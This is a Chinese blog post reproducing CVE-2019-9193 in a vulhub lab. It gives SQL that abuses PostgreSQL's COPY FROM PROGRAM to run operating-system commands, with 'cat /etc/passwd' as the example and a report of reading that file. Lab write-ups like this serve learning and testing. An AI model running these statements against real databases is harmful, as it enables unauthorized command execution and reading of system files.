CVE-2019-9193(高权限远程命令执行漏洞)vulhub复现

影响版本 9.3-11.2

这个漏洞是因为PG的9.3版本之后Postgres新增了一个COPY TO/FROM PROGRAM命令,这个命令允许数据库的超级用户以及pg_read_server_files组中的任何用户执行操作系统命令,也就是说即使不是超级用户也有可能实现任意命令执行。(要么是超级用户要么是pg_read_server_files组中的用户)。

 使用超级用户去复现该漏洞

 我们需要进行的操作,也是该漏洞可以执行的POC

#如果表存在则进行删除,表名(cmd_exec)可以用其它的名称(该步骤可省略)
DROP TABLE IF EXISTS cmd_exec;
 
#创建一张表名,列名(cmd_output)可以用其它的名称
CREATE TABLE cmd_exec(cmd_output text);
 
#用开始提到的COPY执行命令,cmd_exec是保存命令执行后的内容,poc处输入我们需要执行的命令,例如(cat /etc/passwd)
COPY cmd_exec FROM PROGRAM 'poc';
 
#查看cmd_exec命令执行后保存的内容  
SELECT * FROM cmd_exec;

发现我们执行了我们的POC,然后成功读取到了/etc/passwd

  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值